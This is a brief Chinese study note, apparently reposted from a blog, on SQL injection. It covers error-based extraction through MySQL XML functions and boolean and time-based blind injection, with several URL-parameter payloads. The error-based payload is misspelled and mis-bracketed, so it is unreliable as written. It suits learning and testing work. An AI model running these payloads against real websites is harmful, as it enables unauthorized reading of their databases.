4.SQL注入-错误注入与盲注
作者:互联网
一.Union查询注入不使用的地方
1.注入语句无法截断,且不清楚完整的SQL查询语句;
2.页面不能返回查询信息的时候;
3.Web页面中有两个SQL查询语句,查询语句的列数不同;
二.关于MySQL处理XML
1.先准备以下XML内容
?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name)
from information_schma.tables,0x7e),1)
三.盲注
没有回显的时候
1.Boolean型注入
?id=1 and length(database())=5
?id=1 and (select substr(database(),1,1)='l')
2.时间型注入
?id=1 and if(length(database())=5,sleep(2),1);
?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);
标签:语句,database,查询,SQL,盲注,id,select,注入 来源: https://www.cnblogs.com/eveplw/p/16538155.html